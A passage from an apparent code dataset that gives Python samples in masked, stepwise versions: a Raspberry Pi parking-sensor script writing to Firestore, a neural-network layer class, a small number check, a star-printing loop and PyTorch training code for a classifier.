"step-4": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-5": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time \n\n############Explicit Credential environment\npath=\"/home/pi/Desktop/Parking.json\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path\n\n#GPIO starts\ns1=2\ns2=21\nGPIO.setmode(GPIO.BCM) \nGPIO.setwarnings(False)\nGPIO.setup(s1,GPIO.IN)\nGPIO.setup(s2,GPIO.IN)\n\n\n#firestore initialization\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\t\t\t\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\n#here starts main\ndata1=0\ndata2=0\ncounter=0\nwhile 1:\n\t\n\tif(GPIO.input(s1)==False): #car found in slot 1\n\t\tdata1=1\n\t\tcounter+=1\n\telse: data1=0\n \n\tprint(\"Received from 1: %s\" % data1)\n\t###Now starts for sensor 2\t\n\tif(GPIO.input(s2)==False): #car found in slot 2\n\t\tdata2=1\n\t\tcounter-=1\n\telse: data2=0\n\tprint(\"Received from 2: %s\" % data2)\n\tif(counter>8):\n\t\tcounter=8\n\telif(counter<0):\n\t\tcounter=0\n\tprint(\"Counter= %s\" % counter)\n\tdoc_ref_s1.update({\n\t\tu'priority': counter\n\t\t})\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import hlp
import pdb
class Nnt(list):
"""
Generic layer of neural network
"""
def __init__(self):
"""
Initialize the neural network base object.
"""
self.tag = None
def y(self, x):
"""
build sybolic expression of output {y} given input {x}
this also the defaut expression returned when the Net object is
called as a function
"""
return x
def __call__(self, x):
"""
build symbolic expression of output given input. This makes the
object callable.
"""
return self.y(x)
def p(self):
"""
return independent parameters - the shared tensor variables in
output {y}'s expression.
"""
return hlp.parms(self.y(0))
def __repr__(self):
return '{}{}'.format(
"" if self.tag is None else self.tag,
super(Nnt, self).__repr__())
|
normal
|
{
"blob_id": "fb53ea6a7184c0b06fb8a4cbfaf2145cc5c2e8e2",
"index": 9468,
"step-1": "<mask token>\n\n\nclass Nnt(list):\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n <mask token>\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-2": "<mask token>\n\n\nclass Nnt(list):\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n\n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-3": "<mask token>\n\n\nclass Nnt(list):\n \"\"\"\n Generic layer of neural network\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n\n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-4": "import hlp\nimport pdb\n\n\nclass Nnt(list):\n \"\"\"\n Generic layer of neural network\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n\n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-5": "import hlp\nimport pdb\n\nclass Nnt(list):\n \"\"\"\n Generic layer of neural network\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n \n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format(\n \"\" if self.tag is None else self.tag,\n super(Nnt, self).__repr__())\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in k:
if n % i == 0:
f = 1
print('YES')
break
if f == 0:
print('NO')
<|reserved_special_token_1|>
n = int(input())
k = [4, 7, 47, 74, 44, 77, 444, 447, 474, 477, 777, 774, 747, 7444]
f = 0
for i in k:
if n % i == 0:
f = 1
print('YES')
break
if f == 0:
print('NO')
<|reserved_special_token_1|>
n=int(input())
k=[4,7,47,74,44,77,444,447,474,477,777,774,747,7444]
f=0
for i in k:
if(n%i==0):
f=1
print("YES")
break;
if(f==0):
print("NO")
|
flexible
|
{
"blob_id": "6161653fb789040d084e475e0ae25921e2e0676b",
"index": 2496,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in k:\n if n % i == 0:\n f = 1\n print('YES')\n break\nif f == 0:\n print('NO')\n",
"step-3": "n = int(input())\nk = [4, 7, 47, 74, 44, 77, 444, 447, 474, 477, 777, 774, 747, 7444]\nf = 0\nfor i in k:\n if n % i == 0:\n f = 1\n print('YES')\n break\nif f == 0:\n print('NO')\n",
"step-4": "n=int(input())\nk=[4,7,47,74,44,77,444,447,474,477,777,774,747,7444]\nf=0\nfor i in k:\n if(n%i==0):\n f=1\n print(\"YES\")\n break;\nif(f==0):\n print(\"NO\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
for x in range(0, 10, 3):
print('★', end=' ')
print()
print('------------------------')
for y in range(0, 10):
for x in range(0, 10):
print('★', end=' ')
print()
<|reserved_special_token_1|>
# 3번 반복하고 싶은 경우
# 별 10개를 한줄로
for x in range(0, 10, 3): # 3번째 숫자는 증감할 양을 정해줌.
# print(x)
print("★", end=" ")
print()
print("------------------------")
#이중 for문
for y in range(0, 10):
for x in range(0, 10):
# print(x)
print("★", end=" ")
print()
|
flexible
|
{
"blob_id": "b360ba7412bd10e2818511cee81302d407f88fd1",
"index": 1895,
"step-1": "<mask token>\n",
"step-2": "for x in range(0, 10, 3):\n print('★', end=' ')\nprint()\nprint('------------------------')\nfor y in range(0, 10):\n for x in range(0, 10):\n print('★', end=' ')\n print()\n",
"step-3": "# 3번 반복하고 싶은 경우\r\n\r\n# 별 10개를 한줄로\r\nfor x in range(0, 10, 3): # 3번째 숫자는 증감할 양을 정해줌.\r\n # print(x)\r\n print(\"★\", end=\" \")\r\nprint()\r\nprint(\"------------------------\")\r\n#이중 for문\r\nfor y in range(0, 10):\r\n for x in range(0, 10):\r\n # print(x)\r\n print(\"★\", end=\" \")\r\n print()",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from utils import *
import copy
import torch.nn as nn
CUDA = torch.cuda.is_available()
def train_one_epoch(data_loader, net, loss_fn, optimizer):
net.train()
tl = Averager()
pred_train = []
act_train = []
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
tl.add(loss)
pred_train.extend(pred.data.tolist())
act_train.extend(y_batch.data.tolist())
optimizer.zero_grad()
loss.backward()
optimizer.step()
return tl.item(), pred_train, act_train
def predict(data_loader, net, loss_fn):
net.eval()
pred_val = []
act_val = []
vl = Averager()
with torch.no_grad():
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
vl.add(loss.item())
pred_val.extend(pred.data.tolist())
act_val.extend(y_batch.data.tolist())
return vl.item(), pred_val, act_val
def set_up(args):
set_gpu(args.gpu)
ensure_path(args.save_path)
torch.manual_seed(args.random_seed)
torch.backends.cudnn.deterministic = True
def train(args, data_train, label_train, data_val, label_val, subject, fold):
seed_all(args.random_seed)
save_name = '_sub' + str(subject) + '_trial' + str(fold)
set_up(args)
train_loader = get_dataloader(data_train, label_train, args.batch_size)
val_loader = get_dataloader(data_val, label_val, args.batch_size)
model = get_model(args)
para = get_trainable_parameter_num(model)
print('Model {} size:{}'.format(args.model, para))
if CUDA:
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
loss_fn = nn.CrossEntropyLoss()
def save_model(name):
previous_model = osp.join(args.save_path, '{}.pth'.format(name))
if os.path.exists(previous_model):
os.remove(previous_model)
torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))
trlog = {}
trlog['args'] = vars(args)
trlog['train_loss'] = []
trlog['val_loss'] = []
trlog['train_acc'] = []
trlog['val_acc'] = []
trlog['max_acc'] = 0.0
timer = Timer()
for epoch in range(1, args.max_epoch + 1):
loss_train, pred_train, act_train = train_one_epoch(
data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)
acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)
print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'
.format(epoch, loss_train, acc_train, f1_train))
loss_val, pred_val, act_val = predict(
data_loader=val_loader, net=model, loss_fn=loss_fn
)
acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)
print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.
format(epoch, loss_val, acc_val, f1_val))
if acc_val > trlog['max_acc']:
trlog['max_acc'] = acc_val
save_model('max-acc')
if args.save_model:
# save model here for reproduce
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
torch.save(model.state_dict(), model_name_reproduce)
trlog['train_loss'].append(loss_train)
trlog['train_acc'].append(acc_train)
trlog['val_loss'].append(loss_val)
trlog['val_acc'].append(acc_val)
print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),
subject, fold))
save_name_ = 'trlog' + save_name
ensure_path(osp.join(args.save_path, 'log_train'))
torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))
return trlog['max_acc']
def test(args, data, label, reproduce, subject, fold):
seed_all(args.random_seed)
set_up(args)
test_loader = get_dataloader(data, label, args.batch_size, False)
model = get_model(args)
if CUDA:
model = model.cuda()
loss_fn = nn.CrossEntropyLoss()
if reproduce:
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
model.load_state_dict(torch.load(model_name_reproduce))
else:
model.load_state_dict(torch.load(args.load_path))
loss, pred, act = predict(
data_loader=test_loader, net=model, loss_fn=loss_fn
)
acc, f1, cm = get_metrics(y_pred=pred, y_true=act)
print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))
return acc, pred, act
|
normal
|
{
"blob_id": "6ef78e4308f6e693f50df714a5d7af1785e49d7a",
"index": 7682,
"step-1": "<mask token>\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\n<mask token>\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-2": "<mask token>\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-3": "<mask token>\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-4": "from utils import *\nimport copy\nimport torch.nn as nn\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-5": "\r\nfrom utils import *\r\nimport copy\r\nimport torch.nn as nn\r\n\r\nCUDA = torch.cuda.is_available()\r\n\r\n\r\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\r\n net.train()\r\n tl = Averager()\r\n pred_train = []\r\n act_train = []\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n tl.add(loss)\r\n pred_train.extend(pred.data.tolist())\r\n act_train.extend(y_batch.data.tolist())\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n return tl.item(), pred_train, act_train\r\n\r\n\r\ndef predict(data_loader, net, loss_fn):\r\n net.eval()\r\n pred_val = []\r\n act_val = []\r\n vl = Averager()\r\n with torch.no_grad():\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n vl.add(loss.item())\r\n pred_val.extend(pred.data.tolist())\r\n act_val.extend(y_batch.data.tolist())\r\n return vl.item(), pred_val, act_val\r\n\r\n\r\ndef 